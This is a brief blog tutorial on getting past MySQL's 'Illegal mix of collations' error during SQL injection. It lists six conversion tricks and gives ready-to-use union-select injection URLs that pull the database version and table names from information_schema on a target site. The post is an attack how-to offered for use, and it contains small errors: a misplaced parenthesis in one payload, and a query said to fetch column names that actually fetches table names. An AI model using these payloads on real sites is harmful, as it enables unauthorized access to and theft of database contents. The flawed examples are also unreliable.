Tuesday, 24 June 2014

SQLi - Bypass "Illegal mix of collations" Error




In this post, i'm not going to tell you about SQL Injection from the beginning, but i'm just gonna tell you how to bypass the error  "Illegal mix of collations" that occur while you are injecting the site. This error simply can be bypass by using these strings.

1- convert(x() using latin1)

2- aes_decrypt(aes_encrypt(x(),1),1)

3- unhex(hex(@@x))

4- cast(x()+as+binary)

5- convert(x(),binary)

6- convert(x()+using+binary) 

*Note , x = sql query such as , version / database / group_concat(table_name) / etc

For example, i'm going to find the version of the MySQL, but it gives error when i use:

http://www.site.com/index.php?id=null union all select 1,2,@@version,4,5--

So, to bypass this, i will use one of those string:

http://www.site.com/index.php?id=null union all select 1,2,convert(@@version)using latin1),4,5--

If i want to get the column names, this is the query that i should use:

http://www.site.com/index.php?id=null union all select 1,2,convert(group_concat(table_name)using latin1),4,5 from information_schema.tables where table_schema=database()--


Alright, i guess that's all. Watch this video if you still can't understand.